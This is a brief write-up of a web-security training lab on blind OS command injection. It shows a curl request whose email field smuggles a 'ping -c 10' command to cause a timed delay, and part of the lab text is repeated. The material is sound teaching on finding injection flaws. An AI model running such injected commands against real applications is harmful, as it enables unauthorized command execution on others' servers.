LAB 2 - Blind OS command injection with time delays¶

Initial instructions¶

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.¶

To come across with this lab first of all we need to send feedback and intercept this request via BurpSuite.

![[Pasted image 20250405202245.png]]

Once intercepted we can transform this request to curl.

curl -X POST "https://0a7a00a104a549ec806e53c9008b0090.web-security-academy.net/feedback/submit" \
  -H "Cookie: session=uojIvMJ2UiCuasfhRpV11FwYH3ULKxJ6" \
  -d "csrf=Nlasn4hNV4qorY97qn6wXDqFavmrhOa3&name=Astroo18&email=Astroo18%40astroo18.com||ping+-c+10+127.0.0.1||&subject=test&message=test" \
  -o /dev/null -s -w "\nTotal Time: %{time_total}\n"

The command injection is vulnerable via the parameter email.

email=Astroo18%40astroo18.com||ping+-c+10+127.0.0.1||

As we can see, the vulnerable website delays in its response.

![[Pasted image 20250405202920.png]]

LAB 2 - Blind OS command injection with time delays¶

Initial instructions¶

This lab contains a blind OS command injection vulnerability in the feedback function.¶

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.¶

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.¶

Congratulations, you solved the lab!¶